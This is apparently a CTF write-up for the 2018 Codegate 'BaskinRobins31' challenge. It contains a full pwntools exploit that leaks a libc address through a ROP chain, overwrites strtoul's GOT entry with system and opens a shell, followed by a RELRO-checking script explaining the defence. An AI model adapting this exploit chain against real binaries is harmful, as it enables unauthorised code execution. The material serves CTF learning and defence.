
9oat's LAB

Write Up/CTFs

[2018 Codegate] Baskin

90at 2018. 7. 11. 23:47
from pwn import *

b = '/home/goat/PROB/2018 Codegate/BaskinRobins31'
elf = ELF(b)
c = process(b)

pppr = p64(0x40087a)                     # pop rdi ; pop rsi ; pop rdx ; ret

write_plt = elf.plt['write']
write_got = elf.got['write']
read_plt = elf.plt['read']
strtoul_got = elf.got['strtoul']

pay = b''
pay += b'A' * 0xb8                       # padding up to the saved return address
pay += pppr                              # write(1, write_got, 8): leak write's libc address
pay += p64(0x1)
pay += p64(write_got)
pay += p64(0x8)
pay += p64(write_plt)
pay += pppr                              # read(0, strtoul_got, 8): GOT overwrite strtoul -> system
pay += p64(0x0)
pay += p64(strtoul_got)
pay += p64(0x8)
pay += p64(read_plt)
pay += p64(0x4008a4)                     # back into the "your turn" input routine for a second round

c.recvuntil(b'3)')
c.send(pay)
c.recvuntil(b':( \n')

libc_base = u64(c.recv(8)) - 0xf72b0     # leaked write address minus its offset in the target libc
system_addr = libc_base + 0x45390        # system offset in the same libc

print('[*] libc base addr :', hex(libc_base))
print('[*] system() addr :', hex(system_addr))

c.send(p64(system_addr))                 # consumed by read() into strtoul's GOT entry

c.recvuntil(b'3)')
c.send(b'/bin/sh\n')                     # strtoul(input) now ends up calling system(input)
c.recvuntil(b'/bin/sh\n')

c.interactive()


If the binary contains a suitable function that takes a string argument, that function's GOT entry can be overwritten with the address of system instead.

Above, strtoul's GOT entry is overwritten with the address of system.
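The overwrite above only works because the GOT entry is still writable at runtime; Full RELRO (PT_GNU_RELRO together with eager binding) resolves every GOT slot at load time and maps the table read-only, so the read() into strtoul's GOT entry would fault. The following checker is an added example, not part of the original write-up: it parses an ELF64 image's program headers and dynamic table to report the RELRO level the way checksec does, and uses minimal constructed ELF images as its test input (little-endian ELF64 only is assumed).

```python
import struct

# ELF64 constants from the ELF specification and the GNU extensions
PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474e552
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def relro_level(data: bytes) -> str:
    """Classify a little-endian ELF64 image as 'Full', 'Partial' or 'None' RELRO."""
    if data[:4] != b'\x7fELF' or data[4] != 2:
        raise ValueError('not a little-endian ELF64 image')
    (e_phoff,) = struct.unpack_from('<Q', data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from('<HH', data, 0x36)
    has_relro = bind_now = False
    for i in range(e_phnum):
        p_type, _, p_offset, _, _, p_filesz = struct.unpack_from(
            '<IIQQQQ', data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            # walk .dynamic until DT_NULL looking for an eager-binding flag
            for off in range(p_offset, p_offset + p_filesz, 16):
                d_tag, d_val = struct.unpack_from('<qQ', data, off)
                if d_tag == DT_NULL:
                    break
                if d_tag == DT_BIND_NOW or (d_tag == DT_FLAGS and d_val & DF_BIND_NOW) \
                        or (d_tag == DT_FLAGS_1 and d_val & DF_1_NOW):
                    bind_now = True
    # Partial RELRO leaves .got.plt writable, so a GOT overwrite still works there
    if has_relro and bind_now:
        return 'Full'
    return 'Partial' if has_relro else 'None'

def build_elf(relro: bool, bind_now: bool) -> bytes:
    """Constructed sample input: a minimal ELF64 carrying only the headers checked above."""
    types = [PT_DYNAMIC] + ([PT_GNU_RELRO] if relro else [])
    dynamic = struct.pack('<qQ', DT_FLAGS_1, DF_1_NOW) if bind_now else b''
    dynamic += struct.pack('<qQ', DT_NULL, 0)
    dyn_off, dyn_len = 64 + 56 * len(types), len(dynamic)
    ident = b'\x7fELF' + bytes([2, 1, 1, 0]) + bytes(8)        # ELFCLASS64, LSB, version 1
    header = ident + struct.pack('<HHIQQQIHHHHHH', 2, 0x3e, 1, 0, 64, 0, 0,
                                 64, 56, len(types), 64, 0, 0)
    phdrs = b''.join(
        struct.pack('<IIQQQQQQ', t, 4, dyn_off if t == PT_DYNAMIC else 0, 0, 0,
                    dyn_len if t == PT_DYNAMIC else 0, dyn_len if t == PT_DYNAMIC else 0, 8)
        for t in types)
    return header + phdrs + dynamic
```

Running relro_level() over the bytes of a real binary tells you whether its GOT entries are a writable target at all; on a Full RELRO build the overwrite step of the exploit above has nothing to write to.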
